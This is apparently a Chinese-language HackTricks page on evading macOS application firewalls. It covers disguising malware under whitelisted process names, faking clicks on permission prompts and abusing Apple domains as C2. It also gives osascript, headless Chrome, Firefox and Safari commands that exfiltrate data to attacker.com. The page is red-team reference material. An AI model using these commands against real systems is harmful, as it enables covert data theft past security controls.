hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

4.2 KiB
Raw Blame History

macOS 绕过防火墙

从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

发现的技术

以下技术在一些 macOS 防火墙应用中被发现有效。

滥用白名单名称

  • 例如,将恶意软件命名为众所周知的 macOS 进程名称,如 launchd

合成点击

  • 如果防火墙向用户请求权限,让恶意软件点击允许

使用苹果签名的二进制文件

  • curl,但也包括其他的,如 whois

众所周知的苹果域名

防火墙可能允许连接到众所周知的苹果域名,如 apple.comicloud.com。并且 iCloud 可以被用作 C2。

通用绕过

一些尝试绕过防火墙的想法

检查允许的流量

了解允许的流量将帮助您识别可能被列入白名单的域名或哪些应用程序被允许访问它们。

lsof -i TCP -sTCP:ESTABLISHED

滥用 DNS

DNS 解析是通过签名应用程序 mdnsreponder 完成的,该程序很可能被允许联系 DNS 服务器。

通过浏览器应用

  • osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • 谷歌浏览器

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

通过进程注入

如果你能够注入代码到一个允许连接任何服务器的进程中,你可以绕过防火墙保护:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

参考资料

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击

支持HackTricks的其他方式